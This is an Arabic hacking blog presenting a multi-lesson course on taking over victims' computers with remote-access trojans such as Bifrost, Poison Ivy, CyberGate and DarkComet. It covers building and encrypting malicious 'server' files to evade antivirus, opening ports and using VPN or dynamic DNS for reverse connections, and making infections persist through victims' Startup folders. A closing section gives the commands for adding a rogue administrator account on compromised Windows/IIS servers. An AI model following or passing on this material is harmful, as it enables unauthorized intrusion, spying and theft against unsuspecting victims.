اخر الدروس

الجمعة، 27 مايو، 2011

0 مـقدمـة دورة . : دورة اخــتـراق الاجـــهــزة : .

الســلام عليكم ورحمه الله وبركاته
 
مـقدمـة دورة . : دورة اخــتـراق الاجـــهــزة :


فى البداية كل الشكر من ( العرابين هكر ) الى كل من ساهم فى تلك الدورة و خاصة ( bo- jwees )                    
 

كما وعدنا ..

  دوره اختراق الاجهزة وترتيب الدروس من الخطوات الاولى لحد الخطوات الاخيره

حيث سيتم ادراج شروح الاعدادات المهمه لكل جهاز .. سواء كان اكس بي او وندوز سفن او وندوز فيزتا وكذلك طرح دروس التعامل مع برامج اختراق عديده .. فاهم شي التسلسل ..


بعض الدروس البسيطه ستكون بشروح صـور . وحفاظاً على بقاء الصور سيكون في نهايه الموضوع رابط به صور الدرس ..


والدروس التي تشمل Moving كثير سيتم شرحها بالفيديو مع الصـوت ..



اخـواني اختراق الاجهزة بواسطه البرامج الريموت ديسكتوب امر سهل وهو تمهيد للانتقال لمراحل عده سواء في مجال الاجهزة ام المواقع والهـكر مهما نصل ونصل ونصل لن نبلغ اقصى مراحله فهو علم من العلوم والعلم لايفنى مهما حدث


يعني اللي يقول انا زهقت . او درس صعب . او مش مفهوم . او مليت . او مشكله وماعرف حلها بترك هالمجال .. هذي امور ماتنفعك بل توقف طريقك ولو صبرت وحاولت حتوصل لمرادك .

مش عيب تسئل وتستفسر .
لأنه مو كل هكر انولد هكر .. كل مننا تعلم .. ومفيش عيب في العلم والسؤال

كل ما هو مطلوب منك انك تصبر وح تلقا الامر سهل جداً وسلس ..


والدوره بتكون بحدود 10 - 15 درس .. عدد كثير لكن سهل جدا جدا جدا

ومن اسهل المجالات هو اختراق الاجهزة بالبرامج وارسال ملفات

طيب انا ادري انه اكثر مشاكل اللي تعرقل باختراق الاجهزة هو البورت ..

لكن هذي امور مش مستعصيه وصعب اني اشرح فتح بورت في المودمات لأنه هناك ملاييين من المودمات فمش ممكن اروح اشتري مودم واعمل عليه شرح ..
لكني سأتطرق لطرح ماهو بديل للبورت vpn ومش حخليه واقف على موقع واحد .. اكثر من موقع

اهم شي الصب


الشروح اللي بالفيديو سيتم رفعها ع عدة مراكز تحمـيل ..


واسأل الله ان يوفقنا وييسر لنا امورنا يا رب ..





واني لا احتاج الا دعاء لي ولجميع المسلمين هذا هو مرادي ولا اريد اي شيء اخر .. فالدعاء في ظهر الغيب للاخ .. مستجاب


                                           مع تحياتى العراب محمد

2 الدرس الاول -- مفاهـيم أساسيه + شرح عمل الاعدادات للجدار الناري في وندوزxp & vista & 7

السلام عليكم

نبدأ ع بركه الله 


الدرس الاول -- مفاهـيم أساسيه + شرح عمل الاعدادات للجدار الناري في وندوزxp & vista & 7

اعداد --- العراب محمد

اليوم درسنا سهل جدا جدا .. ومهم ايضاً .. والجميع عليه ان يلتزم به سواء من كان اتصاله :
وايرلس او عن طريق USB او بأي طريقه يلزمه يشوف هذا الدرس ...

الا وهو وضع بورت وبرنامج الاختراق في جدار الحمايه حتى لاتمنع الاتصال العكسي المستخدم ببرنامج الاختراق بينك وبين الضحيه

طيب انا لسا جلست افكر بما انه هذا اول درس قبل ما اتطرق لشرح الجدار الناري في مفاهيم بسيطه وقليله بذكر بعضها وبشرحها وكلمات مستخدمه عشان تعرفو انتو ايش جالسين تشتغلو عليه :

اول شي الضحيه : هو اللي حيستلم الملف منك عن طريق ارسال شخصياً او نشر الملف الخبيث اي الضحيه هو اللي حتتحكم فيه .

الملف الخبيث اللي هو باتش اللي هو سيرفر : هو ملف يعمل على عمل اتصال بينك انت كهكر وبين الضحيه ومن خلال هالاتصال يمكنك عمل الكثير والتحكم بجهاز الضحيه على حسب مواصفات البرنامج عند انشاء الباتش ، الباتش عند انشائه بواسطه البرنامج يكون مكشوف من الحمايات اي انه الضحيه اذ استقبله ممكن انه حمايته تحذفه لذا عليك ان تشفره وهنا يأتي دور دوره التشفير وهي موجوده في المنظمة

اتصال VPN : نوع من انواع الاتصال ، يغني عن فتح بورت في المودم بحيث حين عمل حساب من موقع يقدم هذه الخدمه المجانيه ويتم الاتصال تفتح جميع البورتات في الجهاز من ضمنها بورتات برامج الاختراق .

المودم او الراوتر : جهاز منزلي يقدم خدمه الانترنت و يمكن العديد من الاجهزة ان تتصل بالانترنت عن طريق المودم سواء كان جهاز محمول او جهاز مكتبي .

بورت : او مايسمى بالمنفذ فهو منفذ ذا رقم معين يتم عن طريقه اتصال عكسي بين اثنين (( الهكر والضحيه ))

الفايرول : الجدار الناري : هو جدار للحمايه موجود بالانظمة جميعها من وندوز اكس بي و سفن وفيزتا وظيفته منع وحجب اي اتصالات غريبه و خبيثه .

دوس : شاشه سوداء تكتب بها اوامر شيل وتنفذها لك يمكنك مشاهدتها عبر الكتابه في البحث في الجهاز CMD

برنامج الاختراق : هو البرنامج الذي سينشأ لنا الملف وسيتحكم بالضحيه عند فتحه للملف الخبيث (( الباتش)) وبرامج الاختراق كثيره وعديده منها بيفروست وبويزون وسباي نت ودارك كوميت وبرورات و و و و ، وبرامج الاختراق تعتبرها الحمايه قيمه فايروس ضار للجهاز . لذا لاتخف ان اعطاك تحذير انه البرنامج فيه فايروس لكن لكن وركز في هذه الجمله
ممكن انه يتم تلغيم برنامج الاختراق لذا عليك ان تفحص برنامج الاختراق ان كان به تلغيم


اظن بشكل عام قلت اغلب المفاهيم المستخدمه في اختراق الاجهزة بواسطه البرامج
والمفاهيم

الان ننتقل لخطوه مثل ماقلت سهله لكن مهمه

الجدار الناري
ح نغلقه + نستثني برنامج وبورت الاختراق من انه لايمنع من الفايرول .. ضماناً


لا اطيل عليكم
الشروح في الردود القادمه

تم رفع الشروح ع عده مراكز تحميل وضغطها ببرنامج وين رار
تحتاج لتحميل وين رار ان كنت ماتملكه في جهازك من هـنا

نسخه عربيه 32 بت
نسخه عربيه 64 بت

--

نسخه انجليزيه 32 بت
نسخه انجليزيه 64 بت


لأصحــاب وندوز اكس بي
XP

الشرح من هنـــــأ

ومرفوع ع مركز تــحميل اخر

هــــنــأ


 لأصحاب وندوز فيستا
VISTA

الشــرح من هــــــنــــأ

ومرفوع ع مركز تحميل اخر

من هـــــــــنأ
 

لأصحاب وندوز سفن
Windows 7

الشــرح من هــنــأ

ومرفوع ع مركز تــحميل آخر

من هنـــــأ



اى استفسار انشاء الله يكتب فى التعلقيات

1 الدرس الثاني--- تثبيت اي بي الجهـاز لأصــحاب وندوزXp & Vista & 7

الـــــــــــسلام عليكم

 
الدرس الثاني--- تثبيت اي بي الجهـاز لأصــحاب وندوزXp & Vista & 7


اعداد ---- العراب محمد

اليوم درسنا حيكون تثبيت الاي بي للجهاز .. وهي خطوه من الخطوات المهمه

 
ولمن هذا الدرس
الدرس هذا لأصحاب الموديم (( الراوتر )) ...

و كـــ العادة الدرس مشروح فيديو بالصوت والصوره لعيونكم .. ولوندوز اكس بي وفيستا وسفن

درس سهــل جداً ...

اعذورني على حجم الدروس يمكن تكون شوي كبيره لكن تحملو عاد
واهم شي عشان وضوح الشرح حطوه full screen

مــا طول عليكم ..

الاوامر اللي كتبتها


كود بلغة HTML:
run
cmd
ipconfig
ملاحظات الدرس :
* اخر خانتين موجودين في بوكس تثبيت الاي بي نجيبهم عن طريق المودم
نروح للدوس


كود بلغة HTML:
cmd
ipconfig
بيطلع 3 اي بي
defult getway ***.***.**.*
الاي بي في الديفولت قيتواي نحطه في المتصفح وانتر بيطلب يوزر وباسورد انت ومودمك انا وش دراني .. وتحوس في الاعدادات من غير ماتغير شي لحد ماتلقاه

* بعض المودمات يوم تدينا البريمري dns والسكند dns
فقط تكتفي بالبريمري dns
ويطلع السكند dns
-
او
اصفار

اذا طلع كذا يلزمك انك تكتب السكند dns او البديل نفس البريمري لكن في اخر رقم تزيد حبه وحده يعني مثال :

البريمري dns :
192.168.1.5
اذا ماكان حاط لك السكند تخلي السكند كذا نفس رقم البريمري :
192.168.1.6
لاحظو زودت حبه وحده بس



 سوال الموديم بتعى ماعرف اليوزر والباسورد بتعو واللي يقول انا في شخص مديني انترنت ومش قادر اني احط واجيبهم وادخل على معلومات المودم
  الحل بكل بساطه ..
نروح لـ run
نكتب
cmd
ونكتب
ipconfig /all
وانتر
راح يطلع اكثر من اتصال او اتصال واحد فقط اللي هو اتصالك ..
يوم نشوف المعلومات حيطلع معنا البريمري والسكندري
شوفو الصوره توضح


رقم 1 اللي هو البريمري
رقم 2 اهو السكندري او البديل
وبكذا تقدر انك ماتخش المودم وكل شي زي الحلاوه


لأصحاب وندوز XP
اكس بي

الشرح من هـــــــــــــنــــــأ

ومرفوع على مركز تحميل اخر
من هـــــــنا

=============

الملاحظه :

* بعض المودمات يوم تدينا البريمري dns والسكند dns
فقط تكتفي بالبريمري dns
ويطلع السكند dns
-
او
اصفار

اذا طلع كذا يلزمك انك تكتب السكند dns او البديل نفس البريمري لكن في اخر رقم تزيد حبه وحده يعني مثال :

البريمري dns :
192.168.1.5
اذا ماكان حاط لك السكند تخلي السكند كذا نفس رقم البريمري :
192.168.1.6
لاحظو زودت حبه وحده بس

 

لأصحاب وندوز vista
فيستا

لتحميل الدرس من هنــا
او
الدرس مقسم على 3 روابط
الجزء الاول
الجزء الثاني
الجزء الثالث

ومرفوع على مركز تحميل اخر

الجزء الاول
الجزء الثاني
الجزء الثالث


اى استفسار يكتب فى التعلقيات

0 الدرس الثالث --شرح التسـجيل في بعض المـواقع التي تقدم خدمة الفي بي ان vpn

السلام عليكم


الدرس الثالث --شرح التسـجيل في بعض المـواقع التي تقدم خدمة الفي بي ان vpn

اعداد --- العراب محمد

اليــوم درسنا من ابــسط الدروس ومثل ماقلت لكم مش حخلي شي صعب كلو بسيط في بسيط ..


الدرس اللي فات كان لأصحاب المودم (( الراوتر )) وهو تثبيت الاي بي ..
درس اليوم هو التسجيل في مواقع تقدم خدمه الفي بي ان
طيب هذا الدرس لمنو ؟ منو حيستفيد من الدرس او شنو موقع الدرس من اختراق الاجهزة ..

ج : عشان نخترق ضحيه بواسطه برنامج ولنفترض انه بيفروست لازم نفتح بورت في المودم . بعض الناس معهم مشاكل في فتح بورت في المودم من ضمن المشاكل مايلي :
- ماعرف يوزر وباسورد المودم
- مودمي ماعنده صفحه اعدادات
- مش عارف كيف افتح وين اروح اي مكان
- اللي اتصاله عن طريق USB يحطه ويتصل بالنت .

طيب هذول وش حلهم ؟!

حلهم هو الفي بي ان
طيب الفي بي ان وش هو يا بوجويس : الفي بي ان هو اتصال كونكشن خاص يسمح بفتح جميع البورتات من ضمنها بورتات برامج الاختراق
طيب اذا انا عملت ذا الاتصال لازم ارجع للدرس الثاني واثبت الاي بي ؟ انا اقولك لأ
اذا استخدمت اتصال الفي بي ان ماله داعي تفتح بورت في المودم + ماله داعي تثبت الاي بي



طيب انا اقول كنصيحه للي عنده مودم انصحه انه يفتح بورت في المودم تبعه ويحاول فيه كثر مايقدر
طيب يجي واحد ويسأل ويقول طيب يابوجويس ليش انت تقول حاول كثر ماتقدر ويتعب حاله خله يعمل اتصال في بي ان ويريح راسه
ابرد على هذا وابقول له : ماكو شي يخلي من العيوب لأتصال الفي بي ان عيوب منها :
- المواقع اللي تقدم الخدمه تقدمها كتجريبي سواء يوم او اسبوع والماكسمم شهر .
- انت معرض للاختراق
- التبليغ ممكن يوصل متأخر
- ممكن ضحاياك يروحو لشخص اخر او ضحايا يجونك .
- سرعه الانترنت حتقل لكن باختلاف بسيط جدا جدا

لكن المشاكل اللي تواجه في البورت تجبرنا على عمل اتصال في بي ان لذا اعمل وتوكل على الله ..



اذن قبل ما اتطرق للشرح ابقول لكم الخلاصه :

عندك مودم حاول تفتح بورت في الاعدادات كثر ماتقدر حاول .. لحد ماتفتح والامر يصير تمام
تعاني من مشاكل عليك باتصال VPN


-

درس اليوم حيكون التسجــيل في 3 مواقع تقدم خدمه الـ VPN
انا كنت ابخليهم 4 مواقع لكن الموقع الرابع عنيد .. معه مشاكل حتشوفو في الشرح وش سوا فيني خخ

لكن انا قلت وشفت شرح جديد من اخوي الغالي :
OpTiMuS
للاتصال تبع الفي بي ان من موقع اخر وسأدرج رابط موضوعه في نهايه الموضوع هذا .

اذن الان وقت تحميل درس التسجيل في مواقع اللي تقدم خدمه الـ VPN


شرح طويل 20 دقيقه
اعذرونا على الحجم 14 ميغا

لتحـــميل الشرح من هـــــــــــــــــــنـــــأ
ومرفوع على مركز تحــميل اخر
من هــــــــــــنـــــــــأ

طيب سؤال على السريع : يجي واحد ويقول طيب  انا عملت اكاونت في احدى هذه المواقع كيف اتصل ؟
انا اقولك استنى الدرس  وحتعرف كيف تنشأ اتصال في جهازك ووتتصل ..


نسيت المواقع اللي استخدمتها



كود:
www.relakks.com
http://macrovpn.com/
www.vpnreactor.com/
وكمان انا قلت ححط DNS SERVER
الدي ان اس سيرفر للدرس القادم .. مش لهذا الدرس بس احفظوه ضروري جداً يحفظ

ان كان من موقع :

كود:
www.relakks.com
حيصير
PPTP.RELAKKS.COM
وان كان من موقع

كود:
vpnreactor.com/
VPN.VPNREACTOR.COM
وان كان من موقع

كود:
http://macrovpn.com/
حيكون
US6.MACROVPN.COM
اذا عملت حساب في موقع ريلاكس مثلاً احفظ الدي ان اس سيرفر عندك عشان الدرس القادم يوم تعمل الاتصال بجهازك تحطه هو ماتحط تبع موقع اخر 

شرح لأتصال في بي ان من موقع اخر
من هـــنــأ


اى استفسار انشاء الله يكتب فى التعلقيات

0 الدرس الرابـع عمل اتصال vpn في جهازك لأصحاب وندوزXp & Vista & 7

السلام عليكم ورحمه الله وبركاته

الدرس الرابـع عمل اتصال vpn في جهازك لأصحاب وندوزXp & Vista & 7

اعداد --- العراب محمد

نكمل لكم دروس دوره اختراق الاجهزة

اليوم درسنا حيكون تابع للدرس الثالث ، الا وهو عمل اتصال في بي ان في الجهاز

يعني في الدرس السابق حنا نختار موقع من المواقع اللي تقدم خدمه الفي بي ان ونسجل فيه
طيب  انا سجلت بالموقع كيف ح اتصل ؟
يلزم علينا اننا نعمل الاتصال في جهازنا
وبهذا الدرس بنشرح كيف يتم ذلك ..

اهم نقطه في الدرس هذا واللي يربطه بالدرس السابق هي السيرفر دي ان اس او الهوست نيم
اعيد واكرر لكل موقع هوست نيم خاص له
ارفقت لكم في الدرس السابق الهوست نيم للمواقع اللي ادرجتها في الدرس

و هنا كمان عشان ماتنسو ...


ان كان من موقع :
كود:
www.relakks.com

ح يبقى

PPTP.RELAKKS.COM
وان كان من موقع


كود:
vpnreactor.com/

VPN.VPNREACTOR.COM
وان كان من موقع


كود:
http://macrovpn.com/

حيكون

US6.MACROVPN.COM


كمان اكرر هذا الدرس والدرس الثالث للي ماقدرو يفتحو بورت في المودم نظراً للمشاكل اللي تصير معهم وسبق اني ذكرت منها في الدرس الثالث ...
لذلك اللي فتح بورت في المودم وثبت الاي بي يطنش هذا الدرس واللي قبله اللي هو الثالث


 لأصحاب وندوز XP
اكس بي

الشرح من هــــــنـأ

ومرفوع على مركز تحميل آخر

من هـــنـــأ


 لأصحاب وندوز vista
فيستا

لتحميل الدرس من هـــنــأ

ومرفوع على مركز تحميل اخر
من هــــنــأ



لأصحاب وندوز سفن
7

الشرح من هــــنـــأ

ومرفوع على مركز تحميل اخر

هــــنــأ
 

انشاء الله اى استفسار يكتب فى التعلقيات 
السلام عليكم ورحمه الله وبركاته ..


 الدرس الخامس--- شرح عمــل حساب في no-ip (( أو )) dyndns - من اهم الدروس -

اعداد -- العراب محمد

اليوم درسنا حيكون عمل حساب في موقع النو اي بي او موقع الدين دي ان اس

طبعاً انت تختار احدى هذين الموقعين

وانا انصح بالنو اي بي لشهرته ..

الموقع حيوفر لك دي ان اس هوست عشان تحطه على سيرفر برنامج الاختراق وهذا ماسيكون في الدروس القادمه ان شا الله ..

اذن هذا الدرس مهم جدا جدا جدا ..

ما اطيل عليكم

الدرس حجمه 27 ميغا
22 دقيقه

طبعاً هو درسين درس فيه شرح النو اي بي والدين دي ان اس انت تختار واحد منهم وتعمل هوست


لتــحــميل الدرس
من هــــــــنـــا

او مقسم لـ 3 روابط :

الجزء الاول
الجزء الثاني
الجزء الثالث


===

مرفوع الدرس على مركز تحميل اخر

من هــــــــنأ

او مقسم على 3 روابط ..

الجزء الاول
الجزء الثاني
الجزء الثالث 


تعلم صح على الهوست اللي انت عايزة وتضغط حفظ


موقع النو اي بي
www.no-ip.com

أو

موقع الدين دي ان اس 

 www.dyndns.com

6 الدرس السادس -- شرح برنامج بيفروست BifrOsT شرح تكوين الباتش + خصائص البرنامج

السلام عليكم ورحمه الله وبركاته

  الدرس السادس -- شرح برنامج بيفروست BifrOsT شرح تكوين الباتش + خصائص البرنامج

اعداد --- العراب محمد


اليوم جينا لأحلى دروس

الا وهي شرح احدى برامج الاختراق

برنامج بيفروست حبيب الملايين

بورت البرنامج : 81

الشرح الاول حيكون شرح تكوين الباتش
الشرح الثاني حيكون مميزات البرنامج في التحكم بالضحيه

ما اطيلش عليكم واحرق عليكم الدرس 

قبل لا نروح للشروح

لتـــحميل برنامج البيفروست


النسخه العربيه من اخونا

هــــنــأ

النسخه الانجليزيه من اخوكم


هــــنـــأ


 شرح تكــوين الباتش باستخدام برنامج البيفروست

لتــحميل الدرس

من هــــنـــأ


مرفوع على مركز تــحميل آخر

من هـــنـــأ



 شرح خصائص برنامج بيفروست بعد اختراق الضحايا (( مايمكنك التحكم بالضحيه والمميزات ))


لتــحميل الدرس

من هـــنــأ

ومرفوع على مركز تحميل آخر

من هـــنــأ


اى استفسار انشاء الله يكتب فى التعلقيات

0 الدرس السابــع-- شرح برنامج بويزون PoiSoN شرح تكوين الباتش + خصائص البرنامج

السلام عليكم ورحمه الله وبركاته

 
الدرس السابــع -- شرح برنامج بويزون PoiSoN  شرح تكوين الباتش + خصائص البرنامج


اعداد--- العراب محمد

اليوم نكمل لكم دروس الدوره
وطبعاً خلاص انت انتهيت
هذا الدرس مجرد شروح لبرامج الاختراق
لذا انت عليك تختار البرنامج اللي يعجبك وتبدي تلغم وتشفر سيرفراتك وتخترق ..

اليوم معنا برنامج قديم وحلو وانا من عشاق هذا البرنامج وكنت استخدمه شخصياً ولفتره زمنيه كبيره في مجال الهاك الا وهو برنامج البويزون POISON

بورت البرنامج : 3460

وصراحه اقلكم برأيي الشخصي افضل برنامجين لاختراق الاجهزة هما البيفروست والبويزون

طيب يلزم مننـا اننا نحمل برنامج poison
بالاضافه الى وجود البلوقن للبرنامج
طيب اى هو البلوقن ؟
البلوقن هو اضافات للبرنامج تتيح لنا مميزات يمكن استعمالها على الضحيه عند اختراقها
طيب يابوجويس قل لنا من وين نجيب ذا ابقولكم انا جايب لكم البرنامج + البلوقن تبعه وبشرح تكوين الباتش شرحت كيف تحطو البلوقن وتركبوه في البرنامج

اذن علينا اننا نحمل البرنامج + البلوقن اذا حبيت


لتــحميل برنامج Poison Ivy 2.3.2

من هـــنـــأ

ومرفوع على مركز تحـميل اخر

من هـــنــأ


طيب يلزمنا تحمل البلوقن للبويزون

لتحميل البلوقن Plugin Poison

من هـــنــأ

ومرفوع على مركز تحميل اخر

من هـــنـــأ


الان نـأتي للشروح

الشرح الاول حيكون تكوين الباتش في برنامج البويزون
الشرح الثاني حيكون مميزات البرنامج بعد اختراق الضحيه (( اعذروني عملته سريع ))



شرح تكــوين الباتش باستخدام برنامج البويزون

لتحـــميل الشرح

من هـــنــأ

و مرفوع على مركز تحميل اخر

من هـــنــأ



شرح خصائص برنامج البويزون بعد اختراق الضحايا (( مايمكنك التحكم بالضحيه والمميزات ))


لتحميل الشرح

من هــنــأ

ومرفوع على مركز تحميل اخر

من هـــنــأ


اى استفسار يكتب فى التعليقات

0 الدرس الثامن--- شرح برنامج CyberGaTe (( شرح تكوين الباتش + خصائص البرنامج ))

الســـلام عليكم
الدرس الثامن-- شرح برنامج CyberGaTe (( شرح تكوين الباتش + خصائص البرنامج ))

اعداد-- العراب محمد
 

اليوم حنكمل لكم دروس الدوره بدرس جديد وببرنامج اختراق جديد
الا وهو السيبرقيت cybergate

هذا البرنامج عمل ضجه كبيره وهو مشهور جدا جدا جدا جدا عند الغرب وكثيراً منهم يستخدموه

طبعاً له مميزات وله عيوب
ومن اهم العيوب قدره وصول التبليغ شوي ضعيفه + حجم السيرفر الكبير
والمميزات الخواص بالتحكم للضحيه

طبعاً درس اليوم زي كل مره
حيكون مقسم لجزئين
الجزء الاول شرح تكوين الباتش
الجزء الثاني شرح خصائص البرنامج

بورت البرنامج : 999


لتــحميل البرنامج

من الموقع الرسمي

هـــنـــأ

مرفوع من على


هـــنــأ

Or

هـــنــأ



شرح تكــوين الباتش باستخدام برنامج السيبرقيت

لتــحميل الشرح

من هـــنــأ

ومرفوع على مركز تحــميل اخر

من هــنــأ


 اى استفسار يكتب فى التعلقيات

2 الدرس التاسع شرح برنامج DarkComeT Rat (( شرح تكوين الباتش + خصائص البرنامج ))

السلام عليكم
 الدرس التاسع  شرح برنامج DarkComeT Rat (( شرح تكوين الباتش + خصائص البرنامج ))
  
اعداد --- العراب محمد

وتستمر دوره اختراق الاجهزة

بدرس جديد ان شا الله الا وهو

شرح برنامج دارك كوميت

برنامج له مميزات خطيره جدا جدا جدا جدا جدا جدا

مشكلته انه حجم السيرفر كبير ..

طبعاً نفس التنظيم
الشرح الاول : شرح تكوين الباتش
الشرح الثاني : شرح خصائص البرنامج


بورت البرنامج : 1604

ملحوظه : البرنامج له خاصيه انك ماتفتح بورت في المودم لكن بشرط
انك يوم تعمل ليستن ع البورت تكون مفعل UpNP وكمان مفعله في المودم + الجدار الناري
لو مو موجود عندك في المودم خاصيه UPNP افتح له بورت بكيفك او يكون ع اتصال في بي ان


قبل لا انتقل للدرس

لتحميل البرنامج

من الموق عالرسمي روح داون لود واختار النسخه ووافق ع القوانين وحمل ..

www.darkcomet-rat.com/



شرح تكــوين الباتش باستخدام برنامج الدارك كوميت

لتــحميل الشرح

من هــــنـــأ

ومرفوع على مركز تحميل اخر

من هـــنـــأ



شرح خصائص برنامج الدارك كوميت بعد اختراق الضحايا (( مايمكنك التحكم بالضحيه والمميزات ))

لتــحميل الشرح

من هـــنــأ

أو

mediafire.com/download.php?mlaji1ckr1am509

ومرفوع على مركز تحميل اخر

من هـــنــأ 


اى استفسار يكتب فى التعلقيات

0 الدرس العــاشــر شرح برنامج Lost Door شرح تكوين الباتش + خصائص البرنامج


السلام عليكم
 الدرس العــاشــر  شرح برنامج Lost Door شرح تكوين الباتش + خصائص البرنامج 

اعداد ---- العراب محمد




اليوم معانا برنامج اختراق جديد 


ومن برمجه ايادي عربيه ..

برنامج Lost door ,,

برنامج جيد ما استخدمته نهائياً لكن شفته مطروح وكذا حبيت اضيفه لدروس الدوره ,,

طبعاً نفس التنظيم
الشرح الاول : شرح تكوين الباتش
الشرح الثاني : شرح خصائص البرنامج

بورت البرنامج :
يلزمك تفتح 3 بورتات في المودم وهم :
2185
7183
2170


قبل لا انتقل للدرس

لتحميل البرنامج

من الموقع الرسمي

www.lost-door.com/

او برفع من قبلي

من هــنــأ

ومرفوع على مركز تحميل اخر

من هــنــأ




شرح تكــوين الباتش باستخدام برنامج لوست دور

لتــحميل الشرح

من هــنــأ


ومرفوع على مركز تحميل اخر

من هــنـــأ




 شرح خصائص برنامج اللوست دور بعد اختراق الضحايا (( مايمكنك التحكم بالضحيه والمميزات ))


لتحميل الدرس

من هــنـــأ

ومرفوع على مركز تحميل اخر

من هــنـــأ


اى استفسار يكتب فى التعلقيات 

0 [ الـدرس الحادي عشر ] شرح تــثبيت الضحية لضــمان عـدم فقـدانـه (( اخـتياري ))






[ الـدرس الحادي عشر ] شرح تــثبيت الضحية لضــمان عـدم فقـدانـه (( اخـتياري ))
اعداد -- العراب محمد
 
درســنا اليوم بســيط جدا جدا جدا ..

الا وهو تثبيت الضحيه
مافكرة الدرس ؟

فكره الدرس انك تروح لمسار معين في جهاز الضحيه وترفع سيرفرك فيه بحيث كل مايشغل جهازه يشتغل السيرفر بجهازة ..

موضوع بســيط جداً ..


لتحميل الشــرح

من هـــنـــأ


ومرفوع على مركز تحــميل اخر

من هــــنـــأ





طيب المسارات


وندوز اكس بي
كود بلغة HTML:
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
وندوز فيستا
كود بلغة HTML:
C:/Users/user/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup
وندوز سفن 7
كود بلغة HTML:
C:/programData/Microsoft/Windows/Start Menu/Programs/Startup
مــثال بسيط تطبيقاً ببرنامج بيفروست و على ضحيه يمتلك وندوز اكس بي مثلاً :



 
اى استفسار يكتب فى التعلقيات

1 الدرس الثاني عشر والأخير ] شرح كيفية فتح بورت في المودم + عمل فحص للبورت (( لأصحاب المودم فقط ))

السلام عليكم

دورة اختراق الاجهزة الدرس الثانى عشر   

  شرح كيفية فتح بورت في المودم + عمل فحص للبورت (( لأصحاب المودم فقط )


اعداد--- العراب محمد

طبعاً خلاص هذا اخر درس في دوره اختراق الاجهزة
والدرس هذا فقط للي بيفتحوا بورت في المودم ,,

بحيث الدرس هذا مقسم لجزئين :

الجزء الاول حيكون شرح موقع يتيح لنا شروح عديده لراوترات عديده في فتح البورت فيها وكيفيه ذلك
الجزء الثاني حيكون برنامج يفحص لك البورت ونسبه اصحيه هذا البرنامج 60 % يعني مرات يكون البورت مفتوح ويقلك البرنامج انه مصكر انت ماعليه يلزمك تتأكد وتلغم وكذا ..

اللي عاملين اتصـال VPN مالهم دخل بهذا الدرس ,,


طيب

نروح للشـرح :

لتــحميل الشرح

من هــــنـــأ


ومرفوع على مركز تحميل اخر

من هـــنـــأ


الموقع اللي استخدمناه ..




كود بلغة HTML:
http://portforward.com/
ولتحــميل البرنامج اللي استخدمناه في الشــرح


هـــنـــأ من الموقع الرسمي

أو

هــنـــأ



انتــهت الدورة بحمد الله ,,



اى استفسار يكتب فى التعليقات

0 دورة احتراف التشفير ب الهندسة العكسية

حصريا -- دورة احتراف التشفير ب الهندسة العكسية

اعداد--- العراب محمد



أقدم لكم اليوم إخواني دورة في إحتراف التشفير بـ الهندسة العكسية + الهيكس

علماً بأن جميع الدروس بالفيديو يعني ما عليك إلا التطبيق فقط

تتضمن الدورة الدروس التالية :

التشفير بالهندسه العكسيه
تخطي الحمايات بتغير امر نقطة الادخال
شرح التشفير بالتقسيم وتغيير نقطة الادخال
شرح التشفير بالهندسه كود سراج المحبه
شرح التشفير بالهندسه كود سراج المحبه الكود الثالث
شرح التشفير من كل الحمايات
شرح تخطي الحمايات العنيده
كود تنقيح جديد للتشفير
التشفير بزيادة البايتات وتغيير بعض التعديلات

*******
التشفير بالهيكس
التشفير بتقسيم الباتش
التشفير من اغلب الحمايات بدون الهيكس
تشفير سيرفر البيفروست من الفيرا
تشفير ملف الستب من الفيرا
شرح التشفير بتغيير بعض القيم
شرح خفيف طريقة تشفير برنامج تشفير
طريقه جديده 1


للتحميل

رفعت لكم الدروس على رابط واحد حجمة 87 ميغا بعد فك الضغط يصبح حجم الدورة 3 جيجا

http://www.4shared.com/file/13044364...d/_______.html


وبالأخير لا أرجو منكم إلا دعوة صالحة لي ولوالدي في ظهر الغيب

الحمدلله الذى جعلنا من اتباع معلم الدنيا الاول محمد صلى الله عليه وسلم
نعيب زماننا والعيب فينا ********وما لزماننا عيبا سوانا


انشاء الله اى استفسار يكتب فى التعليقات

0 ختام الدورة --- العراب محمد

فى البداية  كل الشكر من( العرابين هكر) الى كل من محترفى الاختراق
الاخ ( نيرودا ) و الاخ ( linux.bt3 ) على الجهد فى تلك الدورة

ختام الدورة --- العراب محمد

تعلمنا بالدرس الماضي كيف نسحب روت على سيرفرات لينوكس ونسيطر على النظام

طيب اذا كان السيرفر ويندوز !!

طبعا السيطرة على انظمة الويندوز تختلف عن اللينوكس ... لكن بدها خبرة بالميتا سبلويت والبفر اوفر فلو لاول طريقتين

لمحة صغيرة :
1- الميتا سبلويت غني عن التعريف ... في ثغرات خاصة بالميتا بتسمحلنا نضيف يوزر جديد بصلاحية ادمن الى سيرفرات الويندوز عن بعد ( remote )

2- البفر اوفر فلو : معناه بالعربي فيض الذاكرة ..... طبعا بشكل مبسط جدا مشان ما فوتكون بالحيط :

ثغرة بالبرنامج يمكنا من استثماره عن بعد بشل كود لتغيير مسار تدفق المعلومات > تمكنا من السيطرة على النظام ~

طبعا ثغرات البفر اوفر فلو معقدة واكتشافها واستغلالها صعب ... لان بدها خبرة كبيرة بلغة الاسمبلي ... خطورتها !! ... كبيرة جدا ..~ .!

ملاحظة مهمة : ذكرت اول طريقة بدها خبرة كبيرة بالميتا .... وبالطريقة الثانية بدها خبرة بلغة الاسمبلي ... لهيك ما يجي حدا ويقلي ليش ما نزلت مثال !

لان حتى لو نزلت مثال لو ما عندك خبرة بهالمجاليين ما رح تفهم شي ~

وخبراء الميتا بيعرفو شو عم بحكي .... اما الاسمبلي فانا اول الناس ما بفهم فيها ابدا والناس يلي بيفهمو بهاللغة قليلين جدا !

بعد ما عرفنا انه هناك 3 طرق للسطيرة على سيرفرات الويندوز وعرفنا اول طريقتين نجي الان الى الطريقة الثالثة وهي تطبق على اصدارات IIS 5 وما دون ~

الامر بسيط جدا نروح ننفذ الامرين التاليين :



كود:
net user Niroda 123456 /add
حيث ان Niroda هو اسم المستخدم الجديد ..

123456 هو الباسورد ~

بعدين بنطبق الامر :


كود:
net localgroup administrators Niroda /add
وهذا الامر بيضيف اليوزر Niroda الى مجموعة administrator وهي المجموعة المسؤولة عن النظام

طبعا بحب انوه شروط تنفيذ الامريين السابقين :

1- سيف مود اوف ~

2- اصدار النظام IIS 5 وما دون ~

طبعا بعد ما ننفذ الامرين السابقين اذا كان السيرفر بيدعم سطح المكتب البعيد ( Remote Desk Top ) بنتصل فيه مثل اي ريموت ثاني

